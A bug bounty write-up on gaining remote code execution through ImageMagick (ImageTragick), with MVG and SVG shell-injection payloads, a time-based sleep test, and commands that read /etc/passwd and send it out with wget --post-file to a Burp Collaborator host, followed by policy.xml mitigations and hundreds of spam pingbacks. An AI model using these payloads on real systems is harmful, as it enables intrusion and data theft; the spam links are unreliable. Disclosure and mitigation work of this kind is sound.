Abusing ImageMagick to obtain RCE

Bug Bounty

Remote Code Execution because of an image source? Is it Possible? Yes! Definitely. Here in this blog post, a Strynx team member found a variation of Remote Code Execution AKA RCE through ImageMagick which earned him a generous bounty of $5000. Amazingly, some tweaks inside the image source exfiltrated the data over DNS (also called side-channel attacks). Let’s see how was it done after a short introduction to ImageMagick.

 What is ImageMagick? ImageMagick is a free and open-source software suite for displaying, converting, and editing raster image and vector image files. It can read and write over 200 image file formats. Suprisingly ImageMagick is used by many Fortune 500 companies. ImageMagick is very popular and some plugins make it easy to use with PHP, Ruby, Node.js and other languages so it is common for websites to use it for image resizing or cropping.

#Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that.

 Coming on to vulnerabilities. Is it secured? No, you have to manually take efforts in securing them. In the year 2016, researchers discovered that it was possible to execute arbitrary code (CVE-2016-3714) by hiding it inside image files that a user uploads. That means an attacker can make a web server do its bidding by uploading an image containing code the attacker chooses. This is all denoted in the site https://imagetragick.com/ which deals on these vulnerabilities and how to mitigate them.

Vulnerabilities in Image Decoder:

ImageMagick allows processing files with external libraries. This feature is called ‘delegate’. It is implemented as a system() with command string (‘command’) from the config file delegates.xml with the actual value for different params (input/output filenames etc). Due to insufficient %M param filtering, it is possible to conduct shell command injection. The most dangerous part is ImageMagick supports several formats like svg, mvg – which allow to include external files from any supported protocol including delegates. As a result, any service, which uses ImageMagick to process user-supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue. Some common exploits: (Code execution commands are set as bold)

exploit.mvg 
 
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context
exploit.svg 
 
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"

xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=

"http://www.w3.org/1999/xlink";>

<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"

x="0" y="0" height="640px" width="480px"/>

</svg>

Here in this case study, we will use our mvg exploit which is interpreted by the server, and when decoded, causes code to execute.

Abusing ImageMagick library to get Remote Code Execution

The program which is being mentioned in the blog post is a private program, hence the representation of the site would be example.com as disclosure is not allowed.

With static image file interpretation, it was observed that ImageMagick was possibly being used in the application. The image file contained certain keywords which helped conclude the possibility. The URL was as follows: https://subdomain.example.com/directory/5b9682b23bb………:avatar?a44c0de5…..c54b5&x6xx9jul3=1

After analysing the source of the image file it was found that an interesting string “EXtdate:modify” resided in it. It was observed that the server converted pictures with “ImageMagick”/”GraphicksMagick” but did not add the -strip command line option. Therefore now the converted image now has the plaintext tEXtdate: create.

Along with this, EXtdate: modify and timestamps are usually included in the png files.

Thus after obtaining this information, it was time to exploit this issue. The exploits shown above were now modified to test the time-based payloads. Here is the sample code used:

push graphic-context
viewbox 0 0 200 200
fill ‘url(https://example.org/vfqBnrslJIi/”;sleep “6.0)’
pop graphic-context

The payload was converted into base64 as the parameter supplying the request indicated it was base64 decoding the request. The newly generated payload for parameter d64:

cHVzaCBncmFwaGljLWNvbnRleHQKdmlld2JveCAwIDAgMjAwIDIwMApmaWxsICd1cmwoaHR0cHM6Ly9leGFtcGxlLm9yZy92ZnFCbnJzbEpJaS8iO3NsZWVwICI2LjApJwpwb3AgZ3JhcGhpYy1jb250ZXh0

It was observed that the payload was base64 decoded and the response was in a delay of 6.0 seconds, confirming the attack.

It was time to exploit further. Direct read access wasn’t presented thus with the help of burp collaborator the results to the executed codes was obtained. The payload was modified to store the output of a command in a txt file and then using wget –post-file to our burp collaborator.

Firstly, the user of the application was checked using whoami. The payload was generated as follows:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|whoami>>/tmp/pwned.txt”)’
pop graphic-context.

The result of the command was stored in pwned.txt and thus using burp collaborator the file was read as follows:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|wget –post-file /tmp/pwned.txt XXX.burpcollaborator.net”)’
pop graphic-context

A ping was observed in the burp collaborator with the request containing the user of the application.

To fully demonstrate the impact a POC was generated to read the contents of /etc/passwd. Using the same steps the two payloads were as follows:

  1. Saving output to pwned.txt
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|cat /etc/passwd >>/tmp/pwned.txt”)’
pop graphic-context
  1. Reading the file using our collaborator
push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg “|wget –post-file /tmp/pwned.txt XXX.burpcollaborator.net”)’
pop graphic-context

As seen in the screenshot, the contents of /etc/passwd of the server were now read confirming the issue on the server.

The issue was reported to the company’s vulnerability disclosure program using appropriate measures. The vulnerability was confirmed within hours of reporting and the fixed was deployed as soon as possible. A bounty of $5000 was rewarded for this issue.

If your website uses ImageMagick Library make sure you mitigate it with appropriate steps as shown below:

  • Verify that all image files begin with the expected “magic bytes” corresponding to the image file types you support before sending them to ImageMagick for processing. (see FAQ for more info)
  • Use a policy file to disable the vulnerable ImageMagick coders. The global policy for ImageMagick is usually found in “/etc/ImageMagick”. The below policy.xml example will disable the coders EPHEMERAL, URL, MVG, and MSL.
Policy.xml file:

<policymap><policy domain="coder" rights="none" pattern="EPHEMERAL" /><policy domain="coder" rights="none" pattern="URL" /><policy domain="coder" rights="none" pattern="HTTPS" /><policy domain="coder" rights="none" pattern="MVG" /><policy domain="coder" rights="none" pattern="MSL" /><policy domain="coder" rights="none" pattern="TEXT" /><policy domain="coder" rights="none" pattern="SHOW" /><policy domain="coder" rights="none" pattern="WIN" /><policy domain="coder" rights="none" pattern="PLT" /></policymap>

That’s all for this blog. Hope you liked it. Stay tuned for upcoming posts. Please subscribe to the blog if you haven’t done yet to never miss any blogs published to the site. Have a nice day!

December 24, 2019
Admin
Bug Bounty
7,776 Comments

7,776 thoughts on “Abusing ImageMagick to obtain RCE”

  1. Pingback: viagra alternative

  2. Pingback: viagra for men

  3. Pingback: canadian pharmacy viagra

  4. Pingback: buy viagra now

  5. Pingback: generic for viagra

  6. Pingback: generic sildenafil 100mg india

  7. Pingback: viagra online

  8. Pingback: alternatives to viagra that work

  9. Pingback: buy viagra pills

  10. Pingback: generic viagra cost

  11. Pingback: viagra prices

  12. Pingback: where to buy viagra without prescription in san francisco

  13. Pingback: where to buy viagra in melbourne australia

  14. Pingback: order propecia

  15. Pingback: cheap viagra

  16. Pingback: buy viagra inline

  17. Pingback: generic sildenafil

  18. Pingback: viagra

  19. Pingback: Viagra 150mg coupon

  20. Pingback: generic viagra

  21. Pingback: order Viagra 130 mg

  22. Pingback: Viagra 120mg prices

  23. Pingback: Viagra 25 mg australia

  24. Pingback: Viagra 120mg online

  25. Pingback: cheap sildenafil

  26. Pingback: buy viagra online

  27. Pingback: buy Viagra 100 mg

  28. Pingback: Viagra 120mg australia

  29. Pingback: how to purchase Cialis 20 mg

  30. Pingback: Cialis 80mg pills

  31. Pingback: generic cialis

  32. Pingback: Cialis 60mg canada

  33. Pingback: cost of Cialis 60 mg

  34. Pingback: Cialis 40 mg prices

  35. Pingback: RxTrustPharm

  36. Pingback: buy cheap sildenafil

  37. Pingback: Cialis 60 mg pharmacy

  38. Pingback: order Cialis 20mg

  39. Pingback: how to purchase Cialis 80 mg

  40. Pingback: Cialis 10mg price

  41. Pingback: sildenafil 150 mg canada

  42. Pingback: canadian rx pharmacy

  43. Pingback: tadalafil 80 mg over the counter

  44. Pingback: tadalafil

  45. Pingback: levitra 40 mg without a doctor prescription

  46. Pingback: lasix 40mg online pharmacy

  47. Pingback: furosemide 100 mg without prescription

  48. Pingback: buying prescription drugs from canada

  49. Pingback: propecia 5 mg without a prescription

  50. Pingback: lexapro 20 mg pills

  51. Pingback: abilify 20mg online

  52. Pingback: viagra achat en france

  53. Pingback: actos 15 mg without a doctor prescription

  54. Pingback: buy aldactone 100mg

  55. Pingback: allegra 120 mg purchase

  56. Pingback: how to purchase allopurinol 300 mg

  57. Pingback: amaryl 4mg price

  58. Pingback: amoxicillin 500mg united kingdom

  59. Pingback: ampicillin 500 mg generic

  60. Pingback: order antabuse 250 mg

  61. Pingback: viagra pills

  62. Pingback: antivert 25mg price

  63. Pingback: arava 10 mg coupon

  64. Pingback: strattera 25 mg united states

  65. Pingback: where to buy aricept 10mg

  66. Pingback: arimidex 1mg medication

  67. Pingback: cheap cialis

  68. Pingback: cost of tamoxifen 20 mg

  69. Pingback: ashwagandha 60caps without a prescription

  70. Pingback: atarax 10mg medication

  71. Pingback: augmentin 750/250 mg united states

  72. Pingback: generic drugs without doctor's prescription

  73. Pingback: avapro 300mg uk

  74. Pingback: avodart 0,5 mg without a prescription

  75. Pingback: baclofen 25mg otc

  76. Pingback: cheapest bactrim 800/160 mg

  77. Pingback: viagra pill

  78. Pingback: canadian pharmacy viagra

  79. Pingback: benicar 20mg australia

  80. Pingback: buy Biaxin 250 mg

  81. Pingback: order Premarin 0,625mg

  82. Pingback: cheap buspar 5 mg

  83. Pingback: tadalafil generic

  84. Pingback: calcium carbonate 500mg prices

  85. Pingback: buy cialis

  86. Pingback: catapres medication

  87. Pingback: rxtrust pharm

  88. Pingback: buy viagra online

  89. Pingback: ceftin 250mg online

  90. Pingback: where can i buy celebrex

  91. Pingback: best pharmacy online

  92. Pingback: celexa otc

  93. Pingback: cephalexin 500mg coupon

  94. Pingback: cipro 750 mg cheap

  95. Pingback: cheap viagra

  96. Pingback: claritin 10mg nz

  97. Pingback: parx casino online

  98. Pingback: wind creek casino online games

  99. Pingback: best online casino usa

  100. Pingback: gambling casino

  101. Pingback: rxtrustpharm.com

  102. Pingback: play online casino real money

  103. Pingback: casino online real money

  104. Pingback: cheap ed pills

  105. Pingback: best real casino online

  106. Pingback: online gambling

  107. Pingback: chumba casino

  108. Pingback: online casino real money

  109. Pingback: car insurance quotes 21

  110. Pingback: accc car insurance

  111. Pingback: car insurance quotes comparison

  112. Pingback: cheap cialis

  113. Pingback: usaa car insurance

  114. Pingback: multiple car insurance quotes

  115. Pingback: car insurance specialists

  116. Pingback: hartford car insurance quotes

  117. Pingback: cialis miami

  118. Pingback: erie car insurance quotes group

  119. Pingback: ed supplements

  120. Pingback: viagra coupons walgreens

  121. Pingback: best car insurance quotes companies

  122. Pingback: buy cialis brand

  123. Pingback: personal car insurance

  124. Pingback: check into cash

  125. Pingback: top ed pills

  126. Pingback: payday loans raleigh nc

  127. Pingback: fast payday loans online

  128. Pingback: installment loans with low interest

  129. Pingback: best quick loans

  130. Pingback: how many mg of viagra should i take

  131. Pingback: levitra 20mg

  132. Pingback: bad credit loans lenders

  133. Pingback: cialis side effects

  134. Pingback: can i buy amoxicillin over the counter in australia

  135. Pingback: payday loans no credit check

  136. Pingback: womens viagra

  137. Pingback: cheap personal loans

  138. Pingback: viagra boner

  139. Pingback: cbd in marijuana

  140. Pingback: cialis from india

  141. Pingback: buy cbd oil with thc

  142. Pingback: what do blue pills do

  143. Pingback: viagra in action

  144. Pingback: cbd oil for pain relief where to buy

  145. Pingback: cbd oil benefits webmd

  146. Pingback: best generic cialis

  147. Pingback: vardenafil generic

  148. Pingback: viagra generic

  149. Pingback: instant online payday loans

  150. Pingback: cbd pills sale

  151. Pingback: viagra falls

  152. Pingback: cbd oil benefits webmd

  153. Pingback: is taking viagra painful

  154. Pingback: cheap generic cialis

  155. Pingback: side effects of cbd oil in dogs

  156. Pingback: how to buy viagra

  157. Pingback: cbd pills sale

  158. Pingback: viagra sample

  159. Pingback: best cbd oil for depression and anxiety

  160. Pingback: blue chew viagra

  161. Pingback: the assignments

  162. Pingback: buy levitra online cheap

  163. Pingback: levitra online

  164. Pingback: photo assignment

  165. Pingback: write essay for money

  166. Pingback: atorvastatin midol

  167. Pingback: kinetic books homework

  168. Pingback: buy essay online

  169. Pingback: premium assignments

  170. Pingback: custom essay writing service reviews

  171. Pingback: essays writing service

  172. Pingback: how to write argument essay

  173. Pingback: how to write a community service essay

  174. Pingback: cleocin cheap

  175. Pingback: clomid without a prescription

  176. Pingback: clonidine 0,1 mg purchase

  177. Pingback: sildenafil vs viagra

  178. Pingback: clozaril for sale

  179. Pingback: 100mg viagra

  180. Pingback: colchicine 0,5 mg nz

  181. Pingback: viagra vs cialis

  182. Pingback: symbicort inhaler 160/4,5mcg without a prescription

  183. Pingback: combivent canada

  184. Pingback: buy coreg

  185. Pingback: show cialis working

  186. Pingback: compare pharmacy prices for prescriptions

  187. Pingback: what are good essay writing services

  188. Pingback: how to purchase compazine 5mg

  189. Pingback: generic cialis

  190. Pingback: coumadin 2 mg uk

  191. Pingback: order cialis 20 mg

  192. Pingback: where to buy cozaar

  193. Pingback: crestor 10mg otc

  194. Pingback: customized essay

  195. Pingback: argumentative essay help

  196. Pingback: cymbalta 30 mg united states

  197. Pingback: buy viagra online

  198. Pingback: cheapest essays writing services

  199. Pingback: help me with my research paper

  200. Pingback: viagra tabs

  201. Pingback: write my paper in apa format

  202. Pingback: how to purchase dapsone 1000caps

  203. Pingback: ddavp pills

  204. Pingback: depakote 500mg online

  205. Pingback: diamox 250mg cheap

  206. Pingback: differin 15g united states

  207. Pingback: diltiazem without a prescription

  208. Pingback: viagra for sale

  209. Pingback: doxycycline medication

  210. Pingback: dramamine 50 mg for sale

  211. Pingback: elavil united kingdom

  212. Pingback: canadian pharmacy review

  213. Pingback: erythromycin 500 mg price

  214. Pingback: viagra or cialis

  215. Pingback: etodolac nz

  216. Pingback: cheapest flomax

  217. Pingback: augmentin cvs price

  218. Pingback: Zithromax online

  219. Pingback: viagra dosages

  220. Pingback: flonase nasal spray australia

  221. Pingback: garcinia cambogia caps price

  222. Pingback: cialis information

  223. Pingback: ed drug comparison

  224. Pingback: geodon 20 mg pharmacy

  225. Pingback: pink viagra for women

  226. Pingback: hyzaar without a prescription

  227. Pingback: cephalexin for prostatitis

  228. Pingback: imitrex nz

  229. Pingback: how to avoid cialis side effects

  230. Pingback: ciprofloxacin taken with dofedilide

  231. Pingback: viagra online

  232. Pingback: how long for cialis to work

  233. Pingback: oxybutynin

  234. Pingback: imodium price

  235. Pingback: viagra amazon

  236. Pingback: useful reference

  237. Pingback: tizanidine and tramadol interactions

  238. Pingback: generic viagra online

  239. Pingback: generic viagra india

  240. Pingback: can women take viagra

  241. Pingback: online pharmacies in canada

  242. Pingback: imuran united kingdom

  243. Pingback: meds presribed with abilify

  244. Pingback: cost of allopurinol at walmart

  245. Pingback: buy cheap zithromax online

  246. Pingback: lamisil 250 mg purchase

  247. Pingback: amiodarone toxicity signs and symptoms

  248. Pingback: viagra for sale

  249. Pingback: cheapest levaquin 750mg

  250. Pingback: what is amitriptyline used to treat

  251. Pingback: lopid online

  252. Pingback: generic viagra 100mg

  253. Pingback: lopressor generic

  254. Pingback: side effects for amlodipine

  255. Pingback: luvox 100 mg nz

  256. Pingback: macrobid 100 mg canada

  257. Pingback: amoxicillin 500mg for sale

  258. Pingback: meclizine 25 mg nz

  259. Pingback: ed meds online without doctor prescription

  260. Pingback: medications to avoid with abilify

  261. Pingback: buy mestinon

  262. Pingback: canada pharmacies without script

  263. Pingback: bloat atorvastatin

  264. Pingback: azithromycin and antacids

  265. Pingback: micardis 80mg over the counter

  266. Pingback: generic Zovirax

  267. Pingback: best canadian online pharmacy

  268. Pingback: generic viagra online pharmacy

  269. Pingback: mobic without a doctor prescription

  270. Pingback: cheap medications

  271. Pingback: online pharmacy canada

  272. Pingback: motrin australia

  273. Pingback: generic baclofen

  274. Pingback: prescription drugs online without

  275. Pingback: nortriptyline 25 mg uk

  276. Pingback: canadian pharmacies shipping to usa

  277. Pingback: does baclofen lower heart rate

  278. Pingback: periactin generic

  279. Pingback: zyban and wellbutrin

  280. Pingback: phenergan cost

  281. Pingback: viagra

  282. Pingback: plaquenil 200 mg pharmacy

  283. Pingback: buspirone for gad

  284. Pingback: prednisolone coupon

  285. Pingback: prevacid 15 mg canada

  286. Pingback: buspar mechanism

  287. Pingback: cheap prilosec

  288. Pingback: stomach upset with coreg

  289. Pingback: cheap proair inhaler 100 mcg

  290. Pingback: how much is viagra

  291. Pingback: procardia tablets

  292. Pingback: celebrex 200mg capsules

  293. Pingback: buy cheap viagra

  294. Pingback: cheap proscar 5 mg

  295. Pingback: nbcnews celexa

  296. Pingback: where to buy protonix

  297. Pingback: provigil australia

  298. Pingback: natural viagra for men

  299. Pingback: cefdinir antibiotic

  300. Pingback: pulmicort 200 mcg cost

  301. Pingback: viagra gone wrong

  302. Pingback: pyridium 200mg without prescription

  303. Pingback: cost of reglan 10mg

  304. Pingback: cialis online purchase

  305. Pingback: remeron 15mg medication

  306. Pingback: zyrtec 2 pills

  307. Pingback: retin-a cream generic

  308. Pingback: coupons for viagra

  309. Pingback: sister viagra prank

  310. Pingback: benadryl cream australia

  311. Pingback: revatio 20 mg pills

  312. Pingback: taking viagra

  313. Pingback: how to purchase risperdal

  314. Pingback: robaxin 500mg prices

  315. Pingback: how to purchase rogaine

  316. Pingback: seroquel 300mg generic

  317. Pingback: cost of singulair 4 mg

  318. Pingback: skelaxin 400 mg pharmacy

  319. Pingback: viagra generic

  320. Pingback: spiriva 9 mcg without prescription

  321. Pingback: tenormin over the counter

  322. Pingback: online viagra prescription

  323. Pingback: my piano pop a cialis and fuck all day

  324. Pingback: thorazine 100 mg usa

  325. Pingback: toprol cheap

  326. Pingback: price for generic viagra

  327. Pingback: order tricor

  328. Pingback: where can i buy valtrex 1000 mg

  329. Pingback: vantin nz

  330. Pingback: cheapest verapamil 40 mg

  331. Pingback: where to buy voltaren

  332. Pingback: order wellbutrin 300 mg

  333. Pingback: zanaflex purchase

  334. Pingback: zestril medication

  335. Pingback: explanation

  336. Pingback: zocor otc

  337. Pingback: zithromax cost

  338. Pingback: zovirax 200mg cost

  339. Pingback: zyloprim 100 mg tablet

  340. Pingback: cheapest zyprexa 10mg

  341. Pingback: zyvox united kingdom

  342. Pingback: sildenafil online

  343. Pingback: tadalafil 40 mg price

  344. Pingback: how to purchase furosemide

  345. Pingback: escitalopram coupon

  346. Pingback: how to buy aripiprazole 10 mg

  347. Pingback: amoxicillin in india

  348. Pingback: pioglitazone 30mg without prescription

  349. Pingback: cialis pictures

  350. Pingback: where to buy spironolactone

  351. Pingback: canadian drug pharmacy

  352. Pingback: fexofenadine 120mg nz

  353. Pingback: local generic viagra

  354. Pingback: glimepiride 1mg over the counter

  355. Pingback: meclizine 25 mg generic

  356. Pingback: leflunomide 10mg uk

  357. Pingback: where can i buy atomoxetine 10mg

  358. Pingback: donepezil without a doctor prescription

  359. Pingback: anastrozole pills

  360. Pingback: sildenafil generic

  361. Pingback: irbesartan without prescription

  362. Pingback: dutasteride tablets

  363. Pingback: olmesartan pharmacy

Post a Comment

Your email address will not be published. Required fields are marked *

*